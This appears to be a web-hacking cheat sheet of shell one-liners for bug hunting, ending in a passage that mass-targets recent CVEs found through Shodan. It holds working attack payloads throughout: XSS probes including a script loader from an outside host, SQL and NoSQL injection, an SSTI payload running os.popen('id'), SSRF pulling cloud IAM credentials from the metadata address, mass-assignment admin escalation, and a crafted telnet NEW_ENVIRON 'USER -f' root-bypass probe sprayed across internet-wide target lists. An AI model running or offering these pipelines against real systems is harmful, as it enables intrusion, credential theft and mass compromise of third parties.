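Resolver quality matters as much as the rate limit here. A small optional helper, reusing the Trickest resolver list already referenced in the wordlist installer above (file names are just examples):

# Refresh public resolvers, then mass-resolve with a high rate limit (hedged example).
wget -q https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
subfinder -d target.com -silent | dnsx -silent -a -resp-only -r resolvers.txt -rl 1000 | anew resolved_fresh.txt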
subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '\.js$' | anew js.txt

cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txt

cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt

cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt

cat file.js | grep -oE "var\s+\w+\s*=\s*['\"][^'\"]+['\"]" | sort -u

cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt

cat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^\"\'\`\s\<\>]+)" | sort -u | anew js_urls.txt

cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -u

cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u

cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt

cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z\-_]{35}" | sort -u | anew google_api_keys.txt

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+\.amazonaws\.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt

cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt

cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt

cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt

Extract Hidden Subdomains from JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sed 's|https\?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txtcat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txtπ Find Hidden Admin Routes in JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txtcat urls.txt | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | dalfox pipe --silence --skip-bavcat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silentecho target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document\.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval\(|\.write\()" && echo "--- @ ---"'cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txtcat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txtcat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txtcat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txtcat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt
cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txtcat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silentcat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txtcat urls.txt | qsreplace '${7*7}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 7*7 %>' | httpx -silent -mr "49"cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silentcat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silentcat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silentkatana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txtgospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anewecho https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txtparamspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txtwaymore -i target.com -mode U -oU urls.txtkatana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txtkatana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt# β οΈ Crawl multiple targets with JavaScript parsing and form extraction
cat alive.txt | katana -d 8 -jc -kf all -aff -ef woff,css,png,svg,jpg,woff2,jpeg,gif,ico -c 50 -p 20 -silent -o katana_multi.txt

# ⚠️ Full crawl with sitemap parsing and robots.txt extraction
gospider -S alive.txt -c 30 -d 5 -t 20 --sitemap --robots --js -a -w --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)" -o gospider_output && cat gospider_output/* | grep -oE 'https?://[^"]+' | sort -u | anew gospider_urls.txt

# ⚠️ Triple source crawling: live + wayback + gau
echo target.com | hakrawler -d 5 -subs -u > hakrawler.txt && waybackurls target.com > wayback.txt && gau target.com > gau.txt && cat hakrawler.txt wayback.txt gau.txt | sort -u | httpx -silent | anew all_crawled.txt

# ⚠️ Headless browser crawl with form interaction and XHR capture
katana -u https://target.com -headless -d 6 -jc -aff -xhr -form -timeout 15 -silent -nc -c 20 | anew headless_interactive.txt

# ⚠️ Crawl with built-in secrets/endpoints/parameters extraction
cariddi -u https://target.com -d 5 -s -e -ext 1 -plain -t 50 -c 20 | tee cariddi_results.txt && grep -E "(api|secret|key|token|pass|auth)" cariddi_results.txt | anew secrets_found.txt

# ⚠️ Mass parallel crawling with deduplication
cat domains.txt | parallel -j 10 "katana -u https://{} -d 5 -jc -silent" | uro | anew parallel_crawl.txt

# ⚠️ Combined crawling + JS endpoint extraction pipeline
katana -u https://target.com -d 5 -jc -silent | grep "\.js$" | httpx -silent | xargs -I@ bash -c 'curl -s @ | grep -oE "(\/[a-zA-Z0-9_\-\/]+)" | sort -u' | anew js_endpoints.txt && gospider -s https://target.com -d 5 -c 10 --js -q | grep -oE 'https?://[^"]+' | anew combined_crawl.txt

# ⚠️ Crawl then auto-scan discovered endpoints for vulnerabilities
katana -u https://target.com -d 6 -jc -kf all -aff -silent | tee crawl_output.txt | grep -E "\.(php|asp|aspx|jsp|do|action)(\?|$)" | nuclei -t /root/nuclei-templates/ -severity high,critical -silent -o crawl_vulns.txt

# ⚠️ Merge historical URLs with live crawl for maximum coverage
waymore -i target.com -mode U -oU waymore_urls.txt && katana -u https://target.com -d 5 -jc -aff -silent -o katana_live.txt && cat waymore_urls.txt katana_live.txt | uro | httpx -silent -mc 200,301,302,403 | anew merged_crawl.txt

# ⚠️ Run all crawlers and extract unique parameters
(gospider -s https://target.com -d 3 -c 10 -q; hakrawler -url https://target.com -d 3; katana -u https://target.com -d 3 -jc -silent) | sort -u | unfurl -u keys | sort | uniq -c | sort -rn | head -100 | anew top_params.txt

X8 Hidden Parameters
cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt

arjun -i urls.txt -oT arjun_params.txt --stable

cat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -ac

cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u

cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100

# ⚠️ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json

# ⚠️ Deep recursive scan with auto-tune and smart filtering
feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt

# ⚠️ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o ferox_@.txt

# ⚠️ Find directories with ffuf, then deep scan each with feroxbuster
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q

# ⚠️ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json

# ⚠️ Parallel scan with multiple wordlists and extensions
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt

# ⚠️ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt

# ⚠️ Extract links from responses and add to scan queue recursively
feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt

# ⚠️ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt

# ⚠️ Recursive API fuzzing with JSON content-type
feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt

cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt

cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt

cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200

cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt

cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt

cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt

cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt

nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt

subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50

nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt

nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt

nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt

nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt

nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt

cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"

cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | anew jwts.txt

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt

# Test endpoints without auth
cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt

for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c

cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt

# ⚠️ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json

# ⚠️ Discover hidden API versions
ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c

# ⚠️ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt

# ⚠️ Fuzz GraphQL endpoints for introspection and queries
ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json

# ⚠️ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json

# ⚠️ Test auth bypass techniques on protected endpoints
cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt

# ⚠️ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt

# ⚠️ Mass API fuzzing with nuclei DAST mode
cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt

# ⚠️ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt

# ⚠️ Generate API wordlist from JS files and fuzz
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\']/(api|v[0-9])/[a-zA-Z0-9/_-]+[\"\']" | tr -d "\"'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.jsoncat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txtcat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txtcat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txtcat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt#!/bin/bash
domain=$1
mkdir -p $domain && cd $domain
# Subdomains
subfinder -d $domain -all -silent | anew subs.txt
amass enum -passive -d $domain | anew subs.txt
assetfinder -subs-only $domain | anew subs.txt
# Alive check
cat subs.txt | httpx -silent -threads 100 | anew alive.txt
# URLs
cat alive.txt | katana -d 5 -jc -silent | anew urls.txt
cat alive.txt | waybackurls | anew urls.txt
cat alive.txt | gau --threads 50 | anew urls.txt
# Vulnerability patterns
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
cat urls.txt | gf ssrf | anew ssrf.txt
cat urls.txt | gf lfi | anew lfi.txt
# Nuclei scan
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt

#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '"><img src=x onerror=alert(1)>' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt

#!/bin/bash
target=$1
mkdir -p $target/api && cd $target/api
# Find API endpoints
cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt
# Extract from JS
cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+)" | sort -u | anew js_api_endpoints.txt
# Test GraphQL
cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt
echo "[+] API recon complete!"Add to your .bashrc or .zshrc:
# Quick recon
recon() {
subfinder -d $1 -silent | anew subs.txt
assetfinder -subs-only $1 | anew subs.txt
cat subs.txt | httpx -silent | anew alive.txt
echo "[+] Found $(wc -l < alive.txt) alive hosts"
}
# XSS scan
xscan() {
echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}
# SQLi scan
sqscan() {
echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}
# JS recon
jsrecon() {
echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}
# Nuclei quick
nuke() {
echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}
# Full pipeline
fullrecon() {
recon $1
cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}
# Certificate search
cert() {
curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}
# Parameter extraction
params() {
echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}
# Subdomain takeover check
takeover() {
subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}
# Port scan
portscan() {
naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}
# Screenshot all
screenshot() {
cat $1 | xargs -I@ gowitness single @ -o screenshots/
}

GNU InetUtils Telnetd Authentication Bypass - Instant Root Shell! Under Active Exploitation!
# Find exposed telnet servers worldwide
shodan search "port:23 telnet" --fields ip_str,port,org | awk '{print $1":"$2}' | anew telnet_targets.txt

# Enumerate telnet services with version detection
nmap -p23 -sV --script=telnet-ntlm-info -iL targets.txt -oG - | grep "23/open" | awk '{print $2}' | anew telnet_open.txt

# Ultra-fast telnet port discovery on large ranges
masscan -p23 --rate=10000 -iL ip_ranges.txt -oG masscan_telnet.txt && cat masscan_telnet.txt | grep "23/open" | awk '{print $4}' | anew telnet_alive.txt

# Identify GNU inetutils-telnetd specifically (vulnerable)
cat telnet_targets.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc -v @ 23 2>&1 | grep -qi "GNU\|inetutils\|Ubuntu\|Debian" && echo "[GNU TELNETD] @"' | tee gnu_telnetd.txt

# Test for NEW_ENVIRON option support (vuln indicator)
cat telnet_targets.txt | xargs -P20 -I@ sh -c 'echo -e "\xff\xfa\x27\x00\x00USER\x01-f\xff\xf0" | timeout 3 nc @ 23 2>/dev/null | grep -q "login\|root\|#" && echo "[CVE-2026-24061 POTENTIAL] @"' | tee cve_2026_24061_potential.txt

# Mass scan with Nuclei template
cat telnet_targets.txt | nuclei -t http/cves/2026/CVE-2026-24061.yaml -c 50 -o cve_2026_24061_vuln.txt

# Extract telnet banners for version analysis
cat telnet_targets.txt | xargs -P50 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -3' | tee telnet_banners.txt | grep -iE "(inetutils|GNU|2\.[0-7])" | anew potentially_vuln_versions.txt

# Discover telnet in internal/external subnets
prips 192.168.0.0/16 | xargs -P100 -I@ sh -c 'timeout 1 nc -zv @ 23 2>&1 | grep -q "succeeded\|open" && echo @' | anew internal_telnet.txt

# Correlate telnet with vulnerable OS (Debian/Ubuntu/Kali)
nmap -p23 -sV -O --script=telnet-encryption -iL telnet_targets.txt -oX telnet_scan.xml && cat telnet_scan.xml | grep -oE "(Debian|Ubuntu|Kali|Linux)" | sort | uniq -c | sort -rn

# Complete telnet vulnerability assessment pipeline
TARGET_RANGE="192.168.1.0/24"; mkdir -p telnet_recon && cd telnet_recon; masscan -p23 --rate=5000 $TARGET_RANGE -oG masscan.txt; cat masscan.txt | grep "23/open" | awk '{print $4}' > telnet_hosts.txt; cat telnet_hosts.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -5' > banners.txt; grep -liE "(GNU|inetutils|ubuntu|debian)" banners.txt | xargs -I@ basename @ .txt > gnu_telnetd_hosts.txt; echo "[+] Found $(wc -l < telnet_hosts.txt) telnet | $(wc -l < gnu_telnetd_hosts.txt) GNU inetutils (potentially vulnerable)"
⚠️ Affected: GNU InetUtils telnetd 1.9.3 - 2.7 (Debian/Ubuntu/Kali/Trisquel) | ✅ Fix: Update to GNU InetUtils 2.8+ or disable telnetd and use SSH
Critical Unauthenticated RCE in n8n Workflow Automation - 100,000+ servers affected! Added to CISA KEV

shodan search "n8n" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew n8n_targets.txt

cat alive.txt | httpx -silent -match-string "n8n" -match-string "workflow" -title | grep -i "n8n" | anew n8n_instances.txt

cat n8n_targets.txt | xargs -I@ -P20 sh -c 'curl -s -o /dev/null -w "%{http_code}" -X POST @/webhook-test/test -H "Content-Type: multipart/form-data" 2>/dev/null | grep -qE "^(200|400|500)$" && echo "POTENTIAL: @"' | tee n8n_webhook_check.txt

curl -s -X POST "https://target.com/webhook/ID" -H "Content-Type: application/json" --data '{"test":1}' -w "\n%{http_code}" | tail -1 | grep -qE "^(200|400)$" && echo "Webhook accepts requests"

cat n8n_targets.txt | httpx -silent -path /rest/settings -match-regex '"versionCli":"[0-9]+\.[0-9]+\.[0-9]+"' | anew n8n_versions.txt

nuclei -l n8n_targets.txt -t http/cves/2026/CVE-2026-21858.yaml -c 30 -o ni8mare_vuln.txt

⚠️ Affected: n8n < 1.121.0 | ✅ Fix: Update to n8n 1.121.0+
Authenticated RCE via Git Node in n8n - Cloud & Self-hosted affected!

cat n8n_targets.txt | httpx -silent -path /rest/node-types -match-string "git" | anew n8n_git_enabled.txt

cat n8n_targets.txt | httpx -silent -path /rest/login -mc 200,401 -title | anew n8n_auth_endpoints.txt

⚠️ Affected: n8n < 1.121.3 | ✅ Fix: Update to n8n 1.121.3+
Command Injection in Legacy D-Link DSL Routers - Under active exploitation!

shodan search "D-Link DSL" --fields ip_str,port | awk '{print $1":"$2}' | httpx -silent | anew dlink_dsl_targets.txt

cat dlink_dsl_targets.txt | httpx -silent -path /dnscfg.cgi -mc 200,401 | anew dlink_dnscfg.txt

cat alive.txt | httpx -silent -match-string "D-Link" -match-string "DSL" -title -tech-detect | anew dlink_routers.txt

⚠️ Affected: Legacy D-Link DSL Gateway Routers (EOL) | ✅ Fix: Replace with supported devices
π RCE via Postgres Parameter Injection in Veeam Backup & Replication π
shodan search "Veeam" --fields ip_str,port | awk '{print "https://"$1":"$2}' | httpx -silent | anew veeam_targets.txtcat alive.txt | httpx -silent -match-string "Veeam" -title -tech-detect | grep -i "veeam" | anew veeam_instances.txt
⚠️ Affected: Veeam B&R 13.0.1.180 and earlier | ✅ Fix: Update to 13.0.1.1071+
Zero-Day XSS in Grafana - 46,500+ instances still vulnerable! Account Takeover possible
shodan search "Grafana" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew grafana_targets.txt
cat grafana_targets.txt | httpx -silent -path /api/frontend/settings -match-regex '"version":"[0-9]+\.[0-9]+\.[0-9]+"' | anew grafana_versions.txt
cat grafana_targets.txt | xargs -I@ sh -c 'curl -sI "@/login?redirect=//" 2>/dev/null | grep -i "location" && echo "CHECK: @"' | tee grafana_redirect_check.txt
cat alive.txt | httpx -silent -path /login -match-string "Grafana" -title | anew grafana_logins.txt
⚠️ Affected: Multiple Grafana versions | ✅ Fix: Update to latest patched version
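To cut false positives from the redirect probe above, it helps to pair the version exposed at `/api/frontend/settings` with the `Location` behaviour of `/login?redirect=//...`. A hedged sketch; `evil.example` is a placeholder marker host:

```bash
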